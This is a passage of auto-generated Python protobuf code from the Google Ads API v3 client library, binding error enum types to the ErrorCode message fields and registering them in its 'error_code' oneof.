_ERRORCODE.fields_by_name['string_format_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__format__error__pb2._STRINGFORMATERRORENUM_STRINGFORMATERROR
_ERRORCODE.fields_by_name['string_length_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__length__error__pb2._STRINGLENGTHERRORENUM_STRINGLENGTHERROR
_ERRORCODE.fields_by_name['operation_access_denied_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operation__access__denied__error__pb2._OPERATIONACCESSDENIEDERRORENUM_OPERATIONACCESSDENIEDERROR
_ERRORCODE.fields_by_name['resource_access_denied_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__access__denied__error__pb2._RESOURCEACCESSDENIEDERRORENUM_RESOURCEACCESSDENIEDERROR
_ERRORCODE.fields_by_name['resource_count_limit_exceeded_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__count__limit__exceeded__error__pb2._RESOURCECOUNTLIMITEXCEEDEDERRORENUM_RESOURCECOUNTLIMITEXCEEDEDERROR
_ERRORCODE.fields_by_name['youtube_video_registration_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_youtube__video__registration__error__pb2._YOUTUBEVIDEOREGISTRATIONERRORENUM_YOUTUBEVIDEOREGISTRATIONERROR
_ERRORCODE.fields_by_name['ad_group_bid_modifier_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__bid__modifier__error__pb2._ADGROUPBIDMODIFIERERRORENUM_ADGROUPBIDMODIFIERERROR
_ERRORCODE.fields_by_name['context_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_context__error__pb2._CONTEXTERRORENUM_CONTEXTERROR
_ERRORCODE.fields_by_name['field_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__error__pb2._FIELDERRORENUM_FIELDERROR
_ERRORCODE.fields_by_name['shared_set_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__set__error__pb2._SHAREDSETERRORENUM_SHAREDSETERROR
_ERRORCODE.fields_by_name['shared_criterion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__criterion__error__pb2._SHAREDCRITERIONERRORENUM_SHAREDCRITERIONERROR
_ERRORCODE.fields_by_name['campaign_shared_set_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__shared__set__error__pb2._CAMPAIGNSHAREDSETERRORENUM_CAMPAIGNSHAREDSETERROR
_ERRORCODE.fields_by_name['conversion_action_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__action__error__pb2._CONVERSIONACTIONERRORENUM_CONVERSIONACTIONERROR
_ERRORCODE.fields_by_name['conversion_adjustment_upload_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__adjustment__upload__error__pb2._CONVERSIONADJUSTMENTUPLOADERRORENUM_CONVERSIONADJUSTMENTUPLOADERROR
_ERRORCODE.fields_by_name['conversion_upload_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__upload__error__pb2._CONVERSIONUPLOADERRORENUM_CONVERSIONUPLOADERROR
_ERRORCODE.fields_by_name['header_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_header__error__pb2._HEADERERRORENUM_HEADERERROR
_ERRORCODE.fields_by_name['database_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_database__error__pb2._DATABASEERRORENUM_DATABASEERROR
_ERRORCODE.fields_by_name['policy_finding_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__finding__error__pb2._POLICYFINDINGERRORENUM_POLICYFINDINGERROR
_ERRORCODE.fields_by_name['enum_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_enum__error__pb2._ENUMERRORENUM_ENUMERROR
_ERRORCODE.fields_by_name['keyword_plan_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__error__pb2._KEYWORDPLANERRORENUM_KEYWORDPLANERROR
_ERRORCODE.fields_by_name['keyword_plan_campaign_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__campaign__error__pb2._KEYWORDPLANCAMPAIGNERRORENUM_KEYWORDPLANCAMPAIGNERROR
_ERRORCODE.fields_by_name['keyword_plan_negative_keyword_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__negative__keyword__error__pb2._KEYWORDPLANNEGATIVEKEYWORDERRORENUM_KEYWORDPLANNEGATIVEKEYWORDERROR
_ERRORCODE.fields_by_name['keyword_plan_ad_group_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__ad__group__error__pb2._KEYWORDPLANADGROUPERRORENUM_KEYWORDPLANADGROUPERROR
_ERRORCODE.fields_by_name['keyword_plan_keyword_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__keyword__error__pb2._KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR
_ERRORCODE.fields_by_name['keyword_plan_idea_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__idea__error__pb2._KEYWORDPLANIDEAERRORENUM_KEYWORDPLANIDEAERROR
_ERRORCODE.fields_by_name['account_budget_proposal_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_account__budget__proposal__error__pb2._ACCOUNTBUDGETPROPOSALERRORENUM_ACCOUNTBUDGETPROPOSALERROR
_ERRORCODE.fields_by_name['user_list_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__list__error__pb2._USERLISTERRORENUM_USERLISTERROR
_ERRORCODE.fields_by_name['change_status_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_change__status__error__pb2._CHANGESTATUSERRORENUM_CHANGESTATUSERROR
_ERRORCODE.fields_by_name['feed_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__error__pb2._FEEDERRORENUM_FEEDERROR
_ERRORCODE.fields_by_name['geo_target_constant_suggestion_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_geo__target__constant__suggestion__error__pb2._GEOTARGETCONSTANTSUGGESTIONERRORENUM_GEOTARGETCONSTANTSUGGESTIONERROR
_ERRORCODE.fields_by_name['campaign_draft_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__draft__error__pb2._CAMPAIGNDRAFTERRORENUM_CAMPAIGNDRAFTERROR
_ERRORCODE.fields_by_name['feed_item_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__error__pb2._FEEDITEMERRORENUM_FEEDITEMERROR
_ERRORCODE.fields_by_name['label_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_label__error__pb2._LABELERRORENUM_LABELERROR
_ERRORCODE.fields_by_name['billing_setup_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_billing__setup__error__pb2._BILLINGSETUPERRORENUM_BILLINGSETUPERROR
_ERRORCODE.fields_by_name['customer_client_link_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__client__link__error__pb2._CUSTOMERCLIENTLINKERRORENUM_CUSTOMERCLIENTLINKERROR
_ERRORCODE.fields_by_name['customer_manager_link_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__manager__link__error__pb2._CUSTOMERMANAGERLINKERRORENUM_CUSTOMERMANAGERLINKERROR
_ERRORCODE.fields_by_name['feed_mapping_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__mapping__error__pb2._FEEDMAPPINGERRORENUM_FEEDMAPPINGERROR
_ERRORCODE.fields_by_name['customer_feed_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__feed__error__pb2._CUSTOMERFEEDERRORENUM_CUSTOMERFEEDERROR
_ERRORCODE.fields_by_name['ad_group_feed_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__feed__error__pb2._ADGROUPFEEDERRORENUM_ADGROUPFEEDERROR
_ERRORCODE.fields_by_name['campaign_feed_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__feed__error__pb2._CAMPAIGNFEEDERRORENUM_CAMPAIGNFEEDERROR
_ERRORCODE.fields_by_name['custom_interest_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_custom__interest__error__pb2._CUSTOMINTERESTERRORENUM_CUSTOMINTERESTERROR
_ERRORCODE.fields_by_name['campaign_experiment_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__experiment__error__pb2._CAMPAIGNEXPERIMENTERRORENUM_CAMPAIGNEXPERIMENTERROR
_ERRORCODE.fields_by_name['extension_feed_item_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__feed__item__error__pb2._EXTENSIONFEEDITEMERRORENUM_EXTENSIONFEEDITEMERROR
_ERRORCODE.fields_by_name['ad_parameter_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__parameter__error__pb2._ADPARAMETERERRORENUM_ADPARAMETERERROR
_ERRORCODE.fields_by_name['feed_item_validation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__validation__error__pb2._FEEDITEMVALIDATIONERRORENUM_FEEDITEMVALIDATIONERROR
_ERRORCODE.fields_by_name['extension_setting_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__setting__error__pb2._EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR
_ERRORCODE.fields_by_name['feed_item_target_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__target__error__pb2._FEEDITEMTARGETERRORENUM_FEEDITEMTARGETERROR
_ERRORCODE.fields_by_name['policy_violation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__violation__error__pb2._POLICYVIOLATIONERRORENUM_POLICYVIOLATIONERROR
_ERRORCODE.fields_by_name['mutate_job_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__job__error__pb2._MUTATEJOBERRORENUM_MUTATEJOBERROR
_ERRORCODE.fields_by_name['partial_failure_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_partial__failure__error__pb2._PARTIALFAILUREERRORENUM_PARTIALFAILUREERROR
_ERRORCODE.fields_by_name['policy_validation_parameter_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__validation__parameter__error__pb2._POLICYVALIDATIONPARAMETERERRORENUM_POLICYVALIDATIONPARAMETERERROR
_ERRORCODE.fields_by_name['size_limit_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_size__limit__error__pb2._SIZELIMITERRORENUM_SIZELIMITERROR
_ERRORCODE.fields_by_name['offline_user_data_job_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_offline__user__data__job__error__pb2._OFFLINEUSERDATAJOBERRORENUM_OFFLINEUSERDATAJOBERROR
_ERRORCODE.fields_by_name['not_whitelisted_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__whitelisted__error__pb2._NOTWHITELISTEDERRORENUM_NOTWHITELISTEDERROR
_ERRORCODE.fields_by_name['manager_link_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_manager__link__error__pb2._MANAGERLINKERRORENUM_MANAGERLINKERROR
_ERRORCODE.fields_by_name['currency_code_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_currency__code__error__pb2._CURRENCYCODEERRORENUM_CURRENCYCODEERROR
_ERRORCODE.fields_by_name['access_invitation_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_access__invitation__error__pb2._ACCESSINVITATIONERRORENUM_ACCESSINVITATIONERROR
_ERRORCODE.fields_by_name['reach_plan_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_reach__plan__error__pb2._REACHPLANERRORENUM_REACHPLANERROR
_ERRORCODE.fields_by_name['invoice_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_invoice__error__pb2._INVOICEERRORENUM_INVOICEERROR
_ERRORCODE.fields_by_name['payments_account_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_payments__account__error__pb2._PAYMENTSACCOUNTERRORENUM_PAYMENTSACCOUNTERROR
_ERRORCODE.fields_by_name['time_zone_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_time__zone__error__pb2._TIMEZONEERRORENUM_TIMEZONEERROR
_ERRORCODE.fields_by_name['asset_link_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__link__error__pb2._ASSETLINKERRORENUM_ASSETLINKERROR
_ERRORCODE.fields_by_name['user_data_error'].enum_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__data__error__pb2._USERDATAERRORENUM_USERDATAERROR
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['request_error'])
_ERRORCODE.fields_by_name['request_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['bidding_strategy_error'])
_ERRORCODE.fields_by_name['bidding_strategy_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['url_field_error'])
_ERRORCODE.fields_by_name['url_field_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['list_operation_error'])
_ERRORCODE.fields_by_name['list_operation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['query_error'])
_ERRORCODE.fields_by_name['query_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['mutate_error'])
_ERRORCODE.fields_by_name['mutate_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['field_mask_error'])
_ERRORCODE.fields_by_name['field_mask_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['authorization_error'])
_ERRORCODE.fields_by_name['authorization_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['internal_error'])
_ERRORCODE.fields_by_name['internal_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['quota_error'])
_ERRORCODE.fields_by_name['quota_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_error'])
_ERRORCODE.fields_by_name['ad_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_error'])
_ERRORCODE.fields_by_name['ad_group_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_budget_error'])
_ERRORCODE.fields_by_name['campaign_budget_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_error'])
_ERRORCODE.fields_by_name['campaign_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['authentication_error'])
_ERRORCODE.fields_by_name['authentication_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_criterion_error'])
_ERRORCODE.fields_by_name['ad_group_criterion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_customizer_error'])
_ERRORCODE.fields_by_name['ad_customizer_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_ad_error'])
_ERRORCODE.fields_by_name['ad_group_ad_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_sharing_error'])
_ERRORCODE.fields_by_name['ad_sharing_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['adx_error'])
_ERRORCODE.fields_by_name['adx_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['asset_error'])
_ERRORCODE.fields_by_name['asset_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['bidding_error'])
_ERRORCODE.fields_by_name['bidding_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_criterion_error'])
_ERRORCODE.fields_by_name['campaign_criterion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['collection_size_error'])
_ERRORCODE.fields_by_name['collection_size_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['country_code_error'])
_ERRORCODE.fields_by_name['country_code_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['criterion_error'])
_ERRORCODE.fields_by_name['criterion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['customer_error'])
_ERRORCODE.fields_by_name['customer_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['date_error'])
_ERRORCODE.fields_by_name['date_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['date_range_error'])
_ERRORCODE.fields_by_name['date_range_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['distinct_error'])
_ERRORCODE.fields_by_name['distinct_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_attribute_reference_error'])
_ERRORCODE.fields_by_name['feed_attribute_reference_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['function_error'])
_ERRORCODE.fields_by_name['function_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['function_parsing_error'])
_ERRORCODE.fields_by_name['function_parsing_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['id_error'])
_ERRORCODE.fields_by_name['id_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['image_error'])
_ERRORCODE.fields_by_name['image_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['language_code_error'])
_ERRORCODE.fields_by_name['language_code_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['media_bundle_error'])
_ERRORCODE.fields_by_name['media_bundle_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['media_upload_error'])
_ERRORCODE.fields_by_name['media_upload_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['media_file_error'])
_ERRORCODE.fields_by_name['media_file_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['multiplier_error'])
_ERRORCODE.fields_by_name['multiplier_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['new_resource_creation_error'])
_ERRORCODE.fields_by_name['new_resource_creation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['not_empty_error'])
_ERRORCODE.fields_by_name['not_empty_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['null_error'])
_ERRORCODE.fields_by_name['null_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['operator_error'])
_ERRORCODE.fields_by_name['operator_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['range_error'])
_ERRORCODE.fields_by_name['range_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['recommendation_error'])
_ERRORCODE.fields_by_name['recommendation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['region_code_error'])
_ERRORCODE.fields_by_name['region_code_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['setting_error'])
_ERRORCODE.fields_by_name['setting_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['string_format_error'])
_ERRORCODE.fields_by_name['string_format_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['string_length_error'])
_ERRORCODE.fields_by_name['string_length_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['operation_access_denied_error'])
_ERRORCODE.fields_by_name['operation_access_denied_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['resource_access_denied_error'])
_ERRORCODE.fields_by_name['resource_access_denied_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['resource_count_limit_exceeded_error'])
_ERRORCODE.fields_by_name['resource_count_limit_exceeded_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['youtube_video_registration_error'])
_ERRORCODE.fields_by_name['youtube_video_registration_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_bid_modifier_error'])
_ERRORCODE.fields_by_name['ad_group_bid_modifier_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['context_error'])
_ERRORCODE.fields_by_name['context_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['field_error'])
_ERRORCODE.fields_by_name['field_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['shared_set_error'])
_ERRORCODE.fields_by_name['shared_set_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['shared_criterion_error'])
_ERRORCODE.fields_by_name['shared_criterion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_shared_set_error'])
_ERRORCODE.fields_by_name['campaign_shared_set_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['conversion_action_error'])
_ERRORCODE.fields_by_name['conversion_action_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['conversion_adjustment_upload_error'])
_ERRORCODE.fields_by_name['conversion_adjustment_upload_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['conversion_upload_error'])
_ERRORCODE.fields_by_name['conversion_upload_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['header_error'])
_ERRORCODE.fields_by_name['header_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['database_error'])
_ERRORCODE.fields_by_name['database_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['policy_finding_error'])
_ERRORCODE.fields_by_name['policy_finding_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['enum_error'])
_ERRORCODE.fields_by_name['enum_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_error'])
_ERRORCODE.fields_by_name['keyword_plan_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_campaign_error'])
_ERRORCODE.fields_by_name['keyword_plan_campaign_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_negative_keyword_error'])
_ERRORCODE.fields_by_name['keyword_plan_negative_keyword_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_ad_group_error'])
_ERRORCODE.fields_by_name['keyword_plan_ad_group_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_keyword_error'])
_ERRORCODE.fields_by_name['keyword_plan_keyword_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['keyword_plan_idea_error'])
_ERRORCODE.fields_by_name['keyword_plan_idea_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['account_budget_proposal_error'])
_ERRORCODE.fields_by_name['account_budget_proposal_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
